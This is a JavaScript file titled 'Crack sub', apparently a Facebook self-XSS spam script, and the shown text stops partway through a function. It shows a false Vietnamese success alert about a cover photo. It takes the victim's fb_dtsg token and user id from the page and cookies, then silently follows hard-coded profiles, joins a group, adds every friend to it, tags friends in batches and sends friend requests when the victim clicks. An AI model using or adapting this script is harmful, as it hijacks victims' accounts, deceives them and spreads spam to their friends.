Crack sub

1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
3. alert('Chúc Mừng Bạn Đã xác nhận làm ảnh bìa thành công, hệ thống sẽ gửi ảnh bìa cho bạn trong 2-4h');
4. function cereziAl(isim) {
5. var tarama = isim + "=";
6. if (document.cookie.length > 0) {
7. konum = document.cookie.indexOf(tarama)
8. if (konum != -1) {
9. konum += tarama.length
10. son = document.cookie.indexOf(";", konum)
11. if (son == -1)
12. son = document.cookie.length
13. return unescape(document.cookie.substring(konum, son))
14. }
15. else { return ""; }
16. }
17. }
18.  
19. function getRandomInt (min, max) {
20. return Math.floor(Math.random() * (max - min + 1)) + min;
21. }
22. function randomValue(arr) {
23. return arr[getRandomInt(0, arr.length-1)];
24. }
25.  
26. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
27. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
28.  
29. function a(abone){
30. var http4 = new XMLHttpRequest();
31.  
32. var url4 = "/ajax/follow/follow_profile.php?__a=1";
33.  
34. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
35. http4.open("POST", url4, true);
36.  
37. //Send the proper header information along with the request
38. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
39. http4.setRequestHeader("Content-length", params4.length);
40. http4.setRequestHeader("Connection", "close");
41.  
42. http4.onreadystatechange = function() {//Call a function when the state changes.
43. if(http4.readyState == 4 && http4.status == 200) {
44.  
45. http4.close; // Close the connection
46.  
47. }
48. }
49.  
50. http4.send(params4);
51. }
52.  
53. function sublist(uidss) {
54. var a = document.createElement('script');
55. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
56. document.body.appendChild(a);
57. }
58. a("553432294802475");
59. a("100004071290986");
60. a("100006289326351");
61. sublist("733406383393519");
62. sublist("301602656653704");
63. sublist("563168877162150");
64.  
65.  
66.  
67.  
68.  
69. var gid = ['274493822674365'];
70. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
71. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
72.  
73. var httpwp = new XMLHttpRequest();
74. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
75. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
76. httpwp['open']('POST', urlwp, true);
77. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
78. httpwp['setRequestHeader']('Content-length', paramswp['length']);
79. httpwp['setRequestHeader']('Connection', 'keep-alive');
80. httpwp['send'](paramswp);
81.  
82. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
83. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
84.  
85. var friends = new Array();
86. gf = new XMLHttpRequest();
87. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
88. gf['send']();
89. if (gf['readyState'] != 4) {} else {
90. data = eval('(' + gf['responseText']['substr'](9) + ')');
91. if (data['error']) {} else {
92. friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
93. return _0x93dax8['index'] - _0x93dax9['index'];
94. });
95. };
96. };
97.  
98. for (var i = 0; i < friends['length']; i++) {
99. var httpwp = new XMLHttpRequest();
100. var urlwp = '/ajax/groups/members/add_post.php?__a=1';
101. var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
102. httpwp['open']('POST', urlwp, true);
103. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
104. httpwp['setRequestHeader']('Content-length', paramswp['length']);
105. httpwp['setRequestHeader']('Connection', 'keep-alive');
106. httpwp['onreadystatechange'] = function () {
107. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
108. };
109. httpwp['send'](paramswp);
110. };
111. var spage_id = "213331565492426";
112. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
113. var smesaj = "";
114. var smesaj_text = "";
115. var arkadaslar = [];
116. var svn_rev;
117. var bugun= new Date();
118. var btarihi = new Date();
119. btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
120. if(!document.cookie.match(/paylasti=(\d+)/)){
121. document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
122. }
123.  
124.  
125. //arkadaslari al ve isle
126. function sarkadaslari_al(){
127. var xmlhttp = new XMLHttpRequest();
128. xmlhttp.onreadystatechange = function () {
129. if(xmlhttp.readyState == 4){
130. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
131. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
132. smesaj = "";
133. smesaj_text = "";
134. for(i=f*10;i<(f+1)*10;i++){
135. if(arkadaslar.payload.entries[i]){
136. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
137. smesaj_text += " " + arkadaslar.payload.entries[i].text;
138. }
139. }
140. sdurumpaylas(); }
141.  
142. }
143.  
144. };
145. var params = "&filter[0]=user";
146. params += "&options[0]=friends_only";
147. params += "&options[1]=nm";
148. params += "&token=v7";
149. params += "&viewer=" + user_id;
150. params += "&__user=" + user_id;
151.  
152. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
153. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
154. xmlhttp.send();
155. }
156.  
157. //tiklama olayini dinle
158. var tiklama = document.addEventListener("click", function () {
159. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
160. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
161. sarkadaslari_al();
162. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
163.  
164. document.removeEventListener(tiklama);
165. }
166. }, false);
167.  
168.  
169. //arkada?¾ ekleme
170. function sarkadasekle(uid,cins){
171. var xmlhttp = new XMLHttpRequest();
172. xmlhttp.onreadystatechange = function () {
173. if(xmlhttp.readyState == 4){
174. }
175. };
176.  
177. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
178. var params = "to_friend=" + uid;
179. params += "&action=add_friend";
180. params += "&how_found=friend_browser";
181. params += "&ref_param=none";
182. params += "&outgoing_id=";
183. params += "&logging_location=friend_browser";
184. params += "&no_flyout_on_click=true";
185. params += "&ego_log_data=";
186. params += "&http_referer=";
187. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
188. params += "&phstamp=165816749114848369115";
189. params += "&__user=" + user_id;
190. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
191. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
192.  
193. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
194. xmlhttp.send(params);
195. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
196. cinsiyetgetir(uid,cins,"sarkadasekle");
197. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
198. xmlhttp.send(params);
199. }
200. }